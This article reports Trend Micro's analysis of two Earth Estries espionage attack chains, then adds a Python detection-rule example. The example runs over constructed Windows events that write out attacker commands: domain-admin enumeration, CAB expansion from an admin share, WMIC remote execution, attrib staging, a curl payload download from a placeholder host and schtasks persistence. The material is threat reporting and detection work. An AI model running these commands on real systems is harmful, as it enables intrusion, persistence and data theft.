Varied Attack Chains from Earth Estries Uncover New Espionage Tactics
A series of cyberattacks attributed to Earth Estries has been detailed by Trend Micro's threat researchers, providing insight into the tactics, techniques, and procedures (TTPs) of this threat actor. Trend Micro's recent analysis builds on prior reporting from August 2024 on a threat actor whose activity overlaps with the adversary group FamousSparrow (aka GhostEmperor and Salt Typhoon). Salt Typhoon, a Chinese state-backed cyber-espionage group with a suspected connection to the country's foreign intelligence operations, has been tied in recent months to cyber campaigns targeting government, telecommunications, and technology organizations in the United States and beyond. Active since at least 2020, Earth Estries has demonstrated a range of capabilities in its intrusions, deploying multiple tools and backdoor malware and exploiting vulnerable servers.
Trend Micro outlines two distinct attack chains, noting both similarities and differences. "There are some commonalities between the two attack chains, such as abuse of vulnerable attack surfaces such as Microsoft Exchange servers and network adapter management tools. However, there are also significant differences. The first chain employs PsExec and WMIC for lateral movement, using tools such as Cobalt Strike, TrillClient, Hemigate, and Crowdoor, which are delivered via CAB file packages. The second chain showcases a different approach, using malware such as Zingdoor, Cobalt Strike, and SnappyBee, as well as utility tools like PortScan and NinjaCopy, which are delivered via curl downloads."
The first chain begins by exploiting vulnerabilities in web management tools such as QConvergeConsole to gain initial access, followed by deploying Cobalt Strike and a custom backdoor, Crowdoor. Though absent in this attack, HemiGate is another second-stage backdoor associated with Earth Estries. Once initial access is achieved, the attackers conduct reconnaissance on domain accounts using the command net group "domain admins" /domain. They then leverage cmd.exe to transfer a malicious go4.cab file to the C$ admin share, use the expand command to extract files from "go4.cab", and execute a batch script, "g2.bat", remotely on the target system via PsExec. Remote command execution is also initiated with WMIC to distribute additional tools and scripts. Trend Micro's analysis of Crowdoor found it capable of interacting "with the Cobalt Strike installation, in keeping with Earth Estries’ tools, tactics, and procedures (TTPs) of cleaning up and reinstalling tools. Both instances of Crowdoor and the reinstalled Cobalt Strike were brought in as CAB files by preceding instances." Crowdoor further establishes persistence by modifying the registry Run key or creating a new service, injecting itself into the “msiexec.exe” process. The TrillClient information stealer is also deployed to gather user credentials and browser data, which is then compressed and exfiltrated using RAR and PowerShell scripts. The script utilizes “xcopy” and “attrib” with flags “-a,” “-s,” “-r,” and “-h” to modify attributes and prepare files for exfiltration to the attacker's Gmail account.
In the second attack chain, Earth Estries exploits vulnerabilities in Microsoft Exchange servers to install web shells, notably China Chopper, which delivers additional malware, including Cobalt Strike, Zingdoor, and SnappyBee (Deed RAT). The web shell then ran discovery commands in sequence, starting with "whoami", "tasklist", and "dir", followed by "curl" to download payloads and "schtasks" to establish persistence through newly created scheduled tasks. Scheduled tasks are also created remotely using WMIC commands, and new services are configured to maintain access. Tools like PortScan are used for network discovery, scanning ports 80, 443, 445, and 3389 to map connected systems for further malware deployment. Additional tactics include creating remote services with "sc", establishing network connections with "net use", and loading DLLs via "rundll32.exe" and "msiexec.exe". Credential dumping is performed with NinjaCopy, as evidenced by the successful extraction of the SYSTEM registry hive. As in the first attack chain, data is collected using RAR and exfiltrated with "curl" to anonymized file-sharing services.
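As an added example (not code from the Trend Micro report or this article), the Python below runs simple detection rules over constructed Windows process-creation events for the commands named in both attack chains above: the net group "domain admins" /domain enumeration, the CAB unpacked from the C$ share with expand, WMIC remote execution, attrib -a -s -r -h staging, curl downloads, and schtasks persistence. The host names, file paths, and placeholder URL in the sample events are invented for the example.

```python
import re

# Process-creation events modelled as {"host", "image", "cmdline"} dicts; all CONSTRUCTED here.
SAMPLE_EVENTS = [
    {"host": "ws01", "image": r"C:\Windows\System32\net.exe",
     "cmdline": 'net group "domain admins" /domain'},
    {"host": "ws01", "image": r"C:\Windows\System32\expand.exe",
     "cmdline": r"expand \\srv02\C$\go4.cab -F:* C:\ProgramData"},
    {"host": "ws01", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r"wmic /node:srv02 process call create cmd /c C:\ProgramData\g2.bat"},
    {"host": "srv02", "image": r"C:\Windows\System32\attrib.exe",
     "cmdline": r"attrib -a -s -r -h C:\ProgramData\stage\*"},
    {"host": "ex01", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl -o C:\ProgramData\a.dll http://placeholder.invalid/a"},
    {"host": "ex01", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks /create /tn Update /tr C:\ProgramData\a.bat /sc minute /mo 30"},
    {"host": "ws01", "image": r"C:\Windows\System32\net.exe",
     "cmdline": r"net use Z: \\fileserver\share"},  # ordinary admin use: must not match
]

# rule name -> (regex on image path, regex on command line); both matched case-insensitively
RULES = {
    "domain_admin_recon": (r"\\net1?\.exe$", r'group\s+"?domain admins"?\s+/domain'),
    "cab_expand_from_admin_share": (r"\\expand\.exe$", r"\\\\[^\s\\]+\\[a-z]\$\\.*\.cab"),
    "wmic_remote_exec": (r"\\wmic\.exe$", r"/node:\S+.*process\s+call\s+create"),
    "attrib_exfil_staging": (r"\\attrib\.exe$", r"(?=.*-a\b)(?=.*-s\b)(?=.*-r\b)(?=.*-h\b)"),
    "curl_payload_download": (r"\\curl\.exe$", r"\s-o\s.*https?://"),
    "schtasks_persistence": (r"\\schtasks\.exe$", r"/create\b"),
}

def classify_events(events):
    """Return (event_index, rule_name) pairs for every event that matches a rule."""
    hits = []
    for idx, ev in enumerate(events):
        for name, (img_re, cmd_re) in RULES.items():
            if re.search(img_re, ev["image"], re.I) and re.search(cmd_re, ev["cmdline"], re.I):
                hits.append((idx, name))
    return hits

def hosts_with_chain(events, min_rules=2):
    """Hosts on which at least `min_rules` distinct rules fired: a crude chain indicator."""
    per_host = {}
    for idx, name in classify_events(events):
        per_host.setdefault(events[idx]["host"], set()).add(name)
    return sorted(h for h, names in per_host.items() if len(names) >= min_rules)

if __name__ == "__main__":
    for idx, name in classify_events(SAMPLE_EVENTS):
        print(f"{SAMPLE_EVENTS[idx]['host']}: {name}")
    print("chain hosts:", hosts_with_chain(SAMPLE_EVENTS))
```

Each rule alone is noisy in a real estate; the host-level correlation is what separates the staged chain from one-off administrative commands.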
Earth Estries' tactics reflect an intent to gather sensitive information aligned with espionage objectives. Earth Estries demonstrates adaptability throughout its campaigns, using widely known vulnerabilities and custom backdoors like Crowdoor and Snappybee to evade detection and expand its reach. Trend Micro states, “Earth Estries’ methods reflect a sophisticated approach to multi-layered cyber espionage that prioritizes persistence and extensive data collection.” The group’s connections to Salt Typhoon raise additional concerns, as demonstrated by their recently executed breaches.